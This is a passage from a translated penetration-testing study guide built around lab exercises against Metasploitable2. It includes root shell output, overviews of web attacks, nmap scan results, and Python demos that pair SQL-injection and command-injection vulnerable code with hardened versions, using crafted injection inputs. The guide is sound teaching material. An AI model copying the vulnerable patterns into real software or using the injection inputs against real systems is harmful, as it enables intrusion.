To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~#

Figure 16 - Connecting to the remote machine using the discovered key
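Seen from the defender's side, the same key archive works as a blacklist. This added sketch, which is not part of the original manual, audits an authorized_keys file on the assumption that each archive file name is the MD5 fingerprint of a public key followed by the generating PID (as in 57c3115d77c56390332dc5c49978627a-5429 above); the key blobs, comments and function names are constructed for illustration.

```python
import base64
import binascii
import hashlib
import re

NAME_RE = re.compile(r"^([0-9a-f]{32})-\d+$")   # <md5 fingerprint>-<pid>

# Constructed key blobs: real ones are much longer, but the fingerprint
# is computed the same way, as MD5 over the decoded base64 field.
WEAK_BLOB = b"\x00\x00\x00\x07ssh-rsa" + b"constructed weak key material"
GOOD_BLOB = b"\x00\x00\x00\x07ssh-rsa" + b"constructed strong key material"


def sample():
    """Constructed authorized_keys lines and archive file names."""
    weak = base64.b64encode(WEAK_BLOB).decode()
    good = base64.b64encode(GOOD_BLOB).decode()
    lines = [
        "# constructed authorized_keys file",
        f"ssh-rsa {good} admin@workstation",
        f'command="/bin/true" ssh-rsa {weak} root@metasploitable',
        "ssh-rsa not*base64 broken@entry",
    ]
    names = [hashlib.md5(WEAK_BLOB).hexdigest() + "-5429", "README.txt"]
    return lines, names


def blacklist_from_names(names):
    """Extract the fingerprints from archive file names, ignoring other files."""
    return {m.group(1) for m in map(NAME_RE.match, names) if m}


def parse_key_line(line):
    """Return (md5_fingerprint, comment) or None if the line holds no key."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # Options may precede the key type, so search for the type field.
    for i, field in enumerate(fields[:-1]):
        if field.startswith(("ssh-", "ecdsa-")):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None          # damaged entry, nothing to fingerprint
            return hashlib.md5(blob).hexdigest(), " ".join(fields[i + 2:])
    return None


def audit(lines, blacklist):
    """Return (line_number, fingerprint, comment) for every blacklisted key."""
    findings = []
    for number, line in enumerate(lines, start=1):
        parsed = parse_key_line(line)
        if parsed and parsed[0] in blacklist:
            findings.append((number, parsed[0], parsed[1]))
    return findings


if __name__ == "__main__":
    key_lines, archive_names = sample()
    for number, fp, comment in audit(key_lines, blacklist_from_names(archive_names)):
        print(f"line {number}: weak key {fp} ({comment}) - remove and regenerate")
```

Any key the audit reports has to be removed and regenerated on a patched system.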

To verify that the obtained session works correctly, enter the "uname" command with the "-a" parameter.

8 EXPLOITATION OF VULNERABILITIES IN WEB APPLICATIONS


Suppose that a web application was discovered while gathering information about the target organization. Almost anything can be called a web application; the main principle is that the application runs on the server side and a client is used to access it. It may be the organization's home page, a web interface for reading corporate mail, an online monitoring system or a browser chat: all of these are web applications.

Breaking into a web application is possible for two reasons:

1) it is a software system which, like any other, can be broken into;

2) the more program code there is, the higher the probability that it contains an error.

The volumes of information that web applications work with are very large. A web server may store personal data of users (customers, employees) and information that in one form or another constitutes a commercial or professional secret (for example, financial information or official correspondence).

8.1 Cross-site scripting (XSS)

XSS is a type of attack on the user that is carried out by including the attacker's code in the web application's responses. Applications that do not validate user-supplied data are most often susceptible to this type of attack. For instance, during registration a user may enter in the "name" field not only letters but also special characters such as "№" or "*", although a name cannot contain special characters.

Attackers most often use JavaScript or Flash, but given the variety of technologies supported by the browser, it can be anything. The most frequent goals of this type of attack are:

• theft of the user's cookie, interaction with the information transmitted during the session, and redirection of the user to another site. A cookie can be stolen by means of XSS. This requires a vulnerable form and the netcat utility, which allows interactive communication with any network service (it can act both as a server and as a client);

• browser redirection, which can be used to make the user download a file. When the user visits the compromised page, the browser automatically offers to download the specified file.

8.2 Local or remote file inclusion


RFI (Remote File Inclusion) is the execution of remote files on the server side; in other words, a server returns, in response to some request, program code that is then opened and run on the victim server. Often, because of poorly written code and an incorrectly configured web server, it becomes possible to include data from a local file or from a file located on a remote server in the code being executed.

8.3 SQL injection

SQL injections are among the most interesting, complex and powerful kinds of attack. Carrying them out requires good knowledge of databases, of SQL itself and of web programming. If data is not properly validated before being sent to the server, an attack of this type is possible. SQL injections are attacks on web applications that use databases in their work. In essence, the attack consists of injecting code into an existing query in order to gain access to data or to manipulate it. Because SQL is so widespread, attacks of this type work on practically all platforms.
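The missing validation described above, shown as an added example that is not part of the original manual: a lookup that concatenates user input into the query text, beside the parameterized form. The table, its rows and the function names are constructed for illustration.

```python
import re
import sqlite3

LOGIN_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")   # assumed allow-list for logins


def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, note TEXT)")
    db.executemany("INSERT INTO users (login, note) VALUES (?, ?)",
                   [("alice", "a-note"), ("bob", "b-note")])
    return db


def find_user_vulnerable(db, login):
    # VULNERABLE: the input becomes part of the SQL text, so a quote in
    # `login` ends the string literal and the rest is parsed as SQL.
    query = "SELECT login, note FROM users WHERE login = '" + login + "'"
    return db.execute(query).fetchall()


def find_user_safe(db, login):
    # Hardened: the query text is constant; the driver passes `login`
    # as a bound value that is never parsed as SQL.
    return db.execute("SELECT login, note FROM users WHERE login = ?",
                      (login,)).fetchall()


def find_user_checked(db, login):
    # Defence in depth: reject input that cannot be a login at all,
    # then still use the parameterized query.
    if not LOGIN_RE.fullmatch(login):
        raise ValueError("invalid login")
    return find_user_safe(db, login)


if __name__ == "__main__":
    db = make_db()
    crafted = "nobody' OR '1'='1"   # constructed input containing a quote
    print("vulnerable:", find_user_vulnerable(db, crafted))  # every row
    print("safe:      ", find_user_safe(db, crafted))        # no rows
```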

8.4 Command Injection

Command injection is an attack whose goal is to execute arbitrary commands in the server's operating system through a vulnerable application. Command injection attacks are possible when a web application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the operating system commands supplied by the attacker are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely because of insufficient validation of input data.
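The path from user data to the system shell described above, as an added example that is not part of the original manual: the same input handed to a shell command line, to an argument vector, and to a validated call. The harmless echo command stands in for whatever tool an application would run; the function names and the host-name pattern are assumptions.

```python
import re
import subprocess

HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")   # assumed allow-list for host names


def resolve_vulnerable(name):
    # VULNERABLE: the input is pasted into a command line that /bin/sh
    # parses, so shell metacharacters in `name` are interpreted.
    done = subprocess.run("echo resolving " + name, shell=True,
                          capture_output=True, text=True)
    return done.stdout


def resolve_argv(name):
    # Hardened: no shell is involved; `name` is a single argument and its
    # characters have no special meaning.
    done = subprocess.run(["echo", "resolving", name],
                          capture_output=True, text=True)
    return done.stdout


def resolve_checked(name):
    # Defence in depth: validate first, then still avoid the shell.
    if not HOST_RE.fullmatch(name):
        raise ValueError("invalid host name")
    return resolve_argv(name)


if __name__ == "__main__":
    crafted = "example.org; echo INJECTED"   # constructed input
    print(repr(resolve_vulnerable(crafted)))  # two commands were run
    print(repr(resolve_argv(crafted)))        # one command, literal text
```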

8.5 CSRF

CSRF (Cross Site Request Forgery, also known as XSRF) is a kind of attack on website visitors that exploits shortcomings of the HTTP protocol. If the victim visits a site created by the attacker, a request is secretly sent on the victim's behalf to another server (for example, a payment system's server) and performs some malicious operation (for example, a transfer of money to the attacker's account). For this attack to succeed, the victim must be authenticated on the server to which the request is sent, and the request must not require any confirmation from the user that cannot be ignored or forged by the attacking script.

LABORATORY WORK No. 1


Purpose of the laboratory work: to acquire practical penetration testing skills in Internet reconnaissance as part of the course "Technology of certification of information protection tools".

Laboratory assignment:

1. Choose an organization about which information will be gathered;

2. Determine the rules by which mail accounts are formed in the organization;

3. Using special search engine operators, find documents with the PDF extension on the organization's domain;

4. Find the non-indexed URLs in the robots.txt file on the organization's domain;

5. Using the service (waybackmachine.org), view cached copies of the organization's site;

6. Determine the network range that contains the site's IP address, and the information about the domain, using the whois utility;

7. Find the subdomains of the organization's main domain and examine their contents.

LABORATORY WORK No. 2


Purpose of the laboratory work: to acquire practical penetration testing skills in vulnerability exploitation as part of the course "Technology of certification of information protection tools".

The laboratory work requires:

1. A virtualization tool - VirtualBox;

2. The image of the virtual machine to be examined - Metasploitable2;

3. The image of the attacker's virtual machine - Kali Linux.

Preparation for the laboratory work:

1) To carry out the laboratory work, the infrastructure must be deployed. To do this, download and install a virtualization environment. The classic solution is Oracle VM VirtualBox (https://www.virtualbox.org/), although equivalents may be used.

2) Install the "victim" virtual machine. In this laboratory work it is Metasploitable2 (Linux), which contains a set of vulnerable applications. To install it, download the file from https://sourceforge.net/projects/metasploitable/ . The zip archive contains a file with the "vmdk" (Virtual Machine Disk) extension holding the Metasploitable2 image.

3) Next, create a new virtual machine in the virtualization environment, choosing the type "Linux" and the version "Linux 2.6/3.x/4.x(64-bit)", and specify the previously downloaded vmdk file as the hard disk.

4) To install the "attacker" virtual machine, download the iso file with the final version of the Kali Linux distribution from https://www.kali.org/downloads/.

5) Next, create a new virtual machine, choosing the type "Linux" and the version "Linux 2.6/3.x/4.x(64-bit)". After the virtual machine has been created, select it in the list on the side and open the settings menu.

6) On the "Storage" tab, select "Controller: IDE" and add a new device, specifying the downloaded iso image as the source (Figure 17).



[Screenshot: the VirtualBox "Storage" settings tab with the prompt to choose an optical disk image for the new drive on the IDE controller or to leave the drive empty.]

Figure 17 - Configuring the virtual machine


7) To complete the infrastructure setup, configure the network so that the virtual machines can see each other. To do this, on the "Network" tab of the settings (see the previous step), select the connection type "NAT" for each virtual machine (Network Address Translation is a mechanism in TCP/IP networks that rewrites the IP addresses of packets in transit) (Figure 18).



[Screenshot: the VirtualBox "Network" settings tab, Adapter 1, with the network adapter enabled and the connection type set to NAT.]

Figure 18 - Configuring the virtual network between the virtual machines


8) Next, check that the settings are correct. Use the "ifconfig" command to find out the IP addresses obtained by the virtual machines, and then check the connection with the "ping" command (Figures 19-21).

root@bad:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.211.55.7  netmask 255.255.255.0  broadcast 10.211.55.255
        inet6 fe80::21c:42ff:fe23:ecd5  prefixlen 64  scopeid 0x20<link>
        inet6 fdb2:2c26:f4e4:0:21c:42ff:fe23:ecd5  prefixlen 64  scopeid 0x0<global>
        inet6 fdb2:2c26:f4e4:0:1c19:b4e8:7196:fe90  prefixlen 64  scopeid 0x0<global>
        ether 00:1c:42:23:ec:d5  txqueuelen 1000  (Ethernet)
        RX packets 88  bytes 9040 (8.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 43  bytes 3792 (3.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 216  bytes 16236 (15.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 216  bytes 16236 (15.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Figure 19 - Checking the network settings of the attacker's machine


msfadmin@metasploitable:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:40:65:26
          inet addr:10.211.55.8  Bcast:10.211.55.255  Mask:255.255.255.0
          inet6 addr: fdb2:2c26:f4e4:0:a00:27ff:fe40:6526/64 Scope:Global
          inet6 addr: fe80::a00:27ff:fe40:6526/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:181588 errors:0 dropped:0 overruns:0 frame:0
          TX packets:181066 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:13149485 (12.5 MB)  TX bytes:9981573 (9.5 MB)
          Base address:0xd010 Memory:f0000000-f0020000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1893 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1893 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:920849 (899.2 KB)  TX bytes:920849 (899.2 KB)

msfadmin@metasploitable:~$


Figure 20 - Checking the network settings of the machine under test

root@bad:~# ping 10.211.55.8
PING 10.211.55.8 (10.211.55.8) 56(84) bytes of data.
64 bytes from 10.211.55.8: icmp_seq=1 ttl=64 time=0.378 ms
64 bytes from 10.211.55.8: icmp_seq=2 ttl=64 time=0.636 ms
64 bytes from 10.211.55.8: icmp_seq=3 ttl=64 time=0.594 ms
^C
--- 10.211.55.8 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2032ms
rtt min/avg/max/mdev = 0.378/0.536/0.636/0.113 ms
root@bad:~#


Figure 21 - Checking connectivity between the virtual machines

9) To determine which network services are running on the machine under test, scan it from the "attacker" machine using the nmap utility (Figure 22).

root@bad:~# nmap -sV 10.211.55.8 -p1-65535

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-02 09:28 MSK
Stats: 0:02:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 19.25% done; ETC: 09:39 (0:09:31 remaining)
Stats: 0:03:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 20.72% done; ETC: 09:47 (0:15:03 remaining)
Nmap scan report for 10.211.55.8
Host is up (0.00059s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec?
513/tcp   open  login
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
40334/tcp open  status      1 (RPC #100024)
47332/tcp open  nlockmgr    1-4 (RPC #100021)
47923/tcp open  rmiregistry GNU Classpath grmiregistry
51020/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:40:65:26 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Figure 22 - Result of scanning the machine under test

The resulting list of services is used for further exploitation.
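The scan result is easier to work with once it is turned into a structured service inventory. The following is an added example, not part of the original manual: it parses the port table of nmap's console output (using an excerpt of the Figure 22 listing as inline sample data) and compares it with a baseline. The names parse_services, audit, allowed_ports and the CLEARTEXT set are assumptions introduced for this illustration.

```python
import re

# Excerpt of the Figure 22 scan output, embedded so the example runs offline.
SCAN = """\
Nmap scan report for 10.211.55.8
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
512/tcp   open  exec?
514/tcp   open  tcpwrapped
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
MAC Address: 08:00:27:40:65:26 (Oracle VirtualBox virtual NIC)
"""

ROW = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")
# Assumption: service names whose protocols send credentials unencrypted.
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell"}


def parse_services(text):
    """Return one dict per port-table row of nmap's normal console output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # banner, column header, MAC and Service Info lines
        port, proto, state, service, version = m.groups()
        rows.append({
            "port": int(port), "proto": proto, "state": state,
            # nmap appends "?" when the service name is only a port-based guess
            "service": service.rstrip("?"), "guessed": service.endswith("?"),
            "version": version or "",  # rows such as 512/tcp carry no version
        })
    return rows


def audit(rows, allowed_ports):
    """Split open ports into unexpected ones and ones using cleartext protocols."""
    open_rows = [r for r in rows if r["state"] == "open"]
    unexpected = sorted(r["port"] for r in open_rows if r["port"] not in allowed_ports)
    cleartext = sorted(r["port"] for r in open_rows if r["service"] in CLEARTEXT)
    return unexpected, cleartext


if __name__ == "__main__":
    services = parse_services(SCAN)
    # Hypothetical baseline: only SSH is expected to be reachable.
    print(audit(services, allowed_ports={22}))
```
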


Lab assignment:

1. Set up the infrastructure for carrying out the lab work.

2. Determine which services are accessible on the machine under test.

3. Gain remote access by exploiting vulnerabilities in four different services.

4. Write up a report on the lab work.
CONCLUSION


This study guide is intended to help students who take the course "Technology of Certification of Information Security Tools" as part of their educational programme to master the material more effectively: to understand the basics of vulnerability exploitation and to appreciate the importance and necessity of certification.

The lab works included in this study guide are intended to help students understand how, in practice, information gathering, obtaining information from network services (network scanning), and searching for and exploiting vulnerabilities are carried out as part of a penetration test.